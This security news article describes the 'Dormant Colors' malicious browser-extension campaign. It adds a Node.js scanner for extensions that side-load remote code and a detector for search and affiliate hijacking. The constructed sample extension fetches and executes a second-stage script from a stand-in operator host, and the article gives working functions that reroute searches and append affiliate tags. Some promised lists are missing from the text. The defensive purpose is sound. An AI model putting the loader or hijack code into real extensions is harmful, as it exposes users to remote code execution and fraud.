Security researchers at Guardio Labs have discovered a new malvertising campaign. The campaign is intended to achieve the following objectives:
The researchers named this malvertising campaign “Dormant Colors.” In total, 30 variants of malicious extensions were identified during the second half of October 2022 on the web stores of popular web browsers:-
What is striking about these malicious browser extensions is that, between them, they have reached more than 1 million active installs globally.
The operators designed the extensions to evade store review and detection: the package itself contains no malicious code, and each extension genuinely offers multiple color customization options to lure users into installing it.
When a victim visits a website that offers videos or downloadable content, they are bombarded with advertisements and malicious redirects that begin the infection chain.
It should be noted that once installed, the extension redirects the victim through a series of malicious web pages from which it side-loads the malicious scripts, so the payload never has to ship inside the extension package that the store reviewed.
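As an added example (not Guardio's tooling and not code from the extensions themselves), the following Node.js script shows the kind of static check a reviewer can run over an unpacked extension to spot the pattern described above: a package whose shipped code looks harmless but which fetches and executes a second-stage script from a remote host at run time, combined with the permissions needed to redirect tabs. The two extensions it inspects, the hostnames and the file names are all constructed for the example; the regexes are heuristics, so a hit is a lead for manual review rather than proof.

```javascript
// Added example: heuristic static scan of an unpacked browser extension for
// the "clean package, remote payload" pattern. Not Guardio's tooling and not
// code from the Dormant Colors extensions; both sample extensions are constructed.

// Host patterns that let a content script or redirect touch every site.
const BROAD_HOSTS = ["<all_urls>", "*://*/*", "http://*/*", "https://*/*"];
// Permissions that make tab redirects or request rewriting possible.
const REDIRECT_PERMISSIONS = ["tabs", "webNavigation", "webRequest", "declarativeNetRequest", "scripting"];

// Source patterns that indicate code being pulled from outside the package at
// run time. Heuristics only: a match is a lead for manual review.
const REMOTE_LOAD_PATTERNS = [
  { name: "fetch-then-eval", re: /fetch\([^)]*\)[\s\S]{0,200}?(?:\beval|new\s+Function)\(/ },
  { name: "remote-script-tag", re: /createElement\(\s*['"]script['"]\s*\)[\s\S]{0,200}?\.src\s*=\s*['"`]https?:/ },
  { name: "importScripts-remote", re: /importScripts\(\s*['"`]https?:/ },
  { name: "tabs-update-redirect", re: /chrome\.tabs\.update\([\s\S]{0,100}?\burl\s*:/ },
];
// Pattern names that by themselves mean code is loaded from outside the package.
const REMOTE_CODE = new Set(["fetch-then-eval", "remote-script-tag", "importScripts-remote"]);

// ext = { manifest: <parsed manifest.json>, files: { "<path>": "<source text>" } }
function scanExtension(ext) {
  const m = ext.manifest;
  const findings = [];
  const hosts = [...(m.host_permissions || []), ...(m.permissions || [])];
  if (hosts.some((h) => BROAD_HOSTS.includes(h))) findings.push("broad-host-permissions");
  const redirectPerms = (m.permissions || []).filter((p) => REDIRECT_PERMISSIONS.includes(p));
  if (redirectPerms.length > 0) findings.push(`redirect-capable:${redirectPerms.join(",")}`);
  let remoteCode = false;
  for (const [file, source] of Object.entries(ext.files)) {
    for (const { name, re } of REMOTE_LOAD_PATTERNS) {
      if (re.test(source)) {
        findings.push(`${name}:${file}`);
        if (REMOTE_CODE.has(name)) remoteCode = true;
      }
    }
  }
  return {
    name: m.name,
    findings,
    verdict: remoteCode ? "side-loads remote code" : "no remote code loading found",
  };
}

// Constructed sample 1: a plain color picker that only uses local storage.
const BENIGN = {
  manifest: { name: "Simple Color Picker", manifest_version: 2, permissions: ["storage"] },
  files: {
    "popup.js": "document.getElementById('pick').onclick = () => chrome.storage.local.set({ color: '#ff0000' });",
  },
};

// Constructed sample 2: the shipped code looks like a theme, but the background
// script pulls a second stage from an (assumed) operator host and runs it, and
// it has the permissions needed to redirect tabs.
const SUSPECT = {
  manifest: {
    name: "Fancy Colors Theme",
    manifest_version: 2,
    permissions: ["tabs", "storage"],
    host_permissions: ["<all_urls>"],
    background: { scripts: ["bg.js"] },
  },
  files: {
    "bg.js": `
// color options shipped in the package look harmless
chrome.runtime.onInstalled.addListener(async () => {
  // the actual payload is fetched from the operator's server and executed
  const r = await fetch("https://cdn.updates-colors.example/stage2.js");
  const code = await r.text();
  (new Function(code))();
});
chrome.tabs.onUpdated.addListener((id, info, tab) => {
  if (tab.url && tab.url.includes("search")) chrome.tabs.update(id, { url: "https://search.operator.example/?q=" + encodeURIComponent(tab.url) });
});
`,
  },
};

for (const ext of [BENIGN, SUSPECT]) {
  const r = scanExtension(ext);
  console.log(`${r.name}: ${r.verdict}`, r.findings);
}
```

On a real machine you would read `manifest.json` and the script files from the unpacked extension directory into the same `{ manifest, files }` shape; the scan itself does not change. Obfuscated or minified payload loaders will defeat simple regexes, which is why a broad-host-permission finding on an extension that has no reason to need it deserves a look even when no remote-load pattern fires.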
The primary purpose of these side-loaded scripts is to make the extension hijack searches and insert affiliate links.
The extensions redirect the victim's search queries so that the results are fetched from websites associated with the extension developers.
The resulting ad impressions and the sale of search data generate substantial revenue for the threat actors operating these extensions.
On top of this, Dormant Colors also tracks the victim's browsing against a list of 10,000 websites. When the victim lands on one of them, the extension automatically redirects them to the same page with the operators' affiliate tags appended to the URL.
Once the affiliate tags are in the URL, the operators of the malicious extensions earn a commission on every sale made on that site.
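To make the two behaviours concrete, here is an added example in Node.js (not the extensions' actual code, and not from the original article) covering both the search hijacking and the affiliate-tag injection described in the paragraphs above: a minimal model of each rewrite, followed by a detector that classifies (requested URL, landed URL) pairs, such as a proxy or browser history would record, as a search hijack, an affiliate injection, or a benign navigation. The hostnames, affiliate parameter names and tag values are assumptions for the example, and the log lines are constructed.

```javascript
// Added example: a minimal model of the search hijacking and affiliate-tag
// injection described above, plus a detector for both. Not the extensions'
// own code; hostnames, parameter names and tag values are assumptions.

// Assumed: search engines the extension watches and their query parameter.
const SEARCH_ENGINES = { "www.google.com": "q", "www.bing.com": "q" };
// Assumed: the operator-controlled search feed that queries are rerouted to.
const OPERATOR_SEARCH = "https://search.operator.example/results";
// Assumed: sites on the affiliate list, with the parameter and tag used on each.
const AFFILIATE_TARGETS = {
  "shop.example": { param: "ref", tag: "op123" },
  "store.example": { param: "aff_id", tag: "9988" },
};

// Behaviour 1: search hijacking. A search-results URL is rewritten so the
// query is served by the operator's feed (returns null for anything else).
function hijackSearch(urlString) {
  const url = new URL(urlString);
  const param = SEARCH_ENGINES[url.hostname];
  if (!param || !url.searchParams.has(param)) return null;
  const out = new URL(OPERATOR_SEARCH);
  out.searchParams.set("q", url.searchParams.get(param));
  return out.toString();
}

// Behaviour 2: affiliate hijacking. On a listed site the same page is reloaded
// with the operator's tag appended, so a later purchase credits them.
// Returns null if the site is not listed or the tag is already present.
function hijackAffiliate(urlString) {
  const url = new URL(urlString);
  const target = AFFILIATE_TARGETS[url.hostname];
  if (!target || url.searchParams.get(target.param) === target.tag) return null;
  url.searchParams.set(target.param, target.tag);
  return url.toString();
}

// Detection: classify a (requested, landed) pair such as a proxy or browser
// history would record. Same host and path with query parameters only added
// looks like affiliate injection; a search query that reappears on a different
// host looks like search hijacking; everything else is treated as benign.
function classifyRedirect(requested, landed) {
  const a = new URL(requested);
  const b = new URL(landed);
  if (a.hostname === b.hostname && a.pathname === b.pathname) {
    const added = [...b.searchParams.keys()].filter((k) => !a.searchParams.has(k));
    return added.length > 0 ? { kind: "affiliate-injection", added } : { kind: "benign" };
  }
  const searchParam = SEARCH_ENGINES[a.hostname];
  if (searchParam && a.searchParams.has(searchParam)) {
    const query = a.searchParams.get(searchParam);
    if ([...b.searchParams.values()].includes(query)) {
      return { kind: "search-hijack", query, to: b.hostname };
    }
  }
  return { kind: "benign" };
}

// Constructed sample log: "<requested> <landed>" per line. The last line is a
// cross-host redirect with no search query, which must not be flagged.
const SAMPLE_LOG = `
https://www.google.com/search?q=winter+jacket https://search.operator.example/results?q=winter+jacket
https://shop.example/item/42?color=blue https://shop.example/item/42?color=blue&ref=op123
https://news.example/article/1 https://news.example/article/1
https://example.org/ https://www.example.org/
`.trim();

function analyzeLog(text) {
  return text.split("\n").map((line) => {
    const [requested, landed] = line.trim().split(/\s+/);
    return { requested, ...classifyRedirect(requested, landed) };
  });
}

for (const r of analyzeLog(SAMPLE_LOG)) console.log(r);
```

The detector deliberately keys on the shape of the redirect rather than on specific tag values, since the operators' affiliate programs and parameter names are not known in advance; in practice you would pair it with an allowlist of query parameters that sites add to their own pages legitimately, or the same-page rule will also flag those.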
The same stealthy techniques could let the operators of Dormant Colors do far more damage than hijacking affiliate links.
Threat actors also gain the ability to redirect victims to fake websites carrying malicious scripts that steal the credentials for the following services:-
That said, there is currently no indication that this credential theft is actually being carried out; the concern is that the same side-loading mechanism could deliver it at any time.